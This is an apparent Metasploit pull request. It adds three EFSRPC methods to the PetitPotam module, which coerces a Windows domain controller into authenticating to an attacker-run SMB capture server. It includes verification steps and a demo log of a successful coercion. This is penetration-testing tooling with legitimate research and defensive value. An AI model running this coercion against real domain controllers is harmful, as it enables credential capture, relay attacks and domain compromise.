### PR TITLE
Additional PetitPotam Methods

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -431,7 +431,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.2.4)
+    ruby_smb (3.2.5)
       bindata
       openssl-ccm
       openssl-cmac

--- a/LICENSE_GEMS
+++ b/LICENSE_GEMS
@@ -156,7 +156,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.4, "New BSD"
+ruby_smb, 3.2.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT

--- a/modules/auxiliary/scanner/dcerpc/petitpotam.rb
+++ b/modules/auxiliary/scanner/dcerpc/petitpotam.rb
@@ -6,6 +6,7 @@
 require 'windows_error'
 require 'ruby_smb'
 require 'ruby_smb/error'
+require 'ruby_smb/dcerpc/encrypting_file_system'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DCERPC
@@ -14,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
 
   EncryptingFileSystem = RubySMB::Dcerpc::EncryptingFileSystem
 
-  METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv].freeze
+  METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv EfsRpcDecryptFileSrv EfsRpcQueryUsersOnFile EfsRpcQueryRecoveryAgents].freeze
   PIPE_HANDLES = {
     lsarpc: {
       uuid: EncryptingFileSystem::LSARPC_UUID,


### PR DESCRIPTION
This adds 3 additional methods to the existing PetitPotam module. The definitions for these methods require the changes from rapid7/ruby_smb#248. When Microsoft patched CVE-2021-36942, they addressed the original PetitPotam methods. After that patch, the technique could still be used against a domain controller **as a normal authenticated user** with one of the unpatched methods (the three added here). After CVE-2021-36942 was patched in August of 2021 the additional methods were also patched in December 2021, though I can't find a particular CVE to attribute them to.

The three new methods:

* EfsRpcDecryptFileSrv
* EfsRpcQueryUsersOnFile
* EfsRpcQueryRecoveryAgents

## Verification


- [ ] Setup a Domain Controller at or below the November 2021 patch level
- [ ] Create a limited user account
- [ ] Run the `auxiliary/server/capture/smb` module
- [ ] Run petitpotam with the limited user account and method set to `Automatic` or set the method to one of the three new ones
- [ ] See that the capture server received authentication attempts


## Demo
In this demo the method is set to Automatic, so you can see that it cycles through them until one works. `EfsRpcOpenFileRaw` fails because the Aug-2021 patches are applied then `EfsRpcEncryptFileSrv` succeeds because the Dec-2021 patches are not applied. The SMB capture server is running in the background.
Note that `EfsRpcEncryptFileSrv` was an older method but is one that still works when authenticated.

```
msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.15:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.15[\lsarpc] ...
[*] 192.168.159.15:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.15[\lsarpc] ...
[*] 192.168.159.15:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.159.15:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.15:445    - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] Received SMB connection on Auth Capture Server!
[+] 192.168.159.15:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.15:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >
```
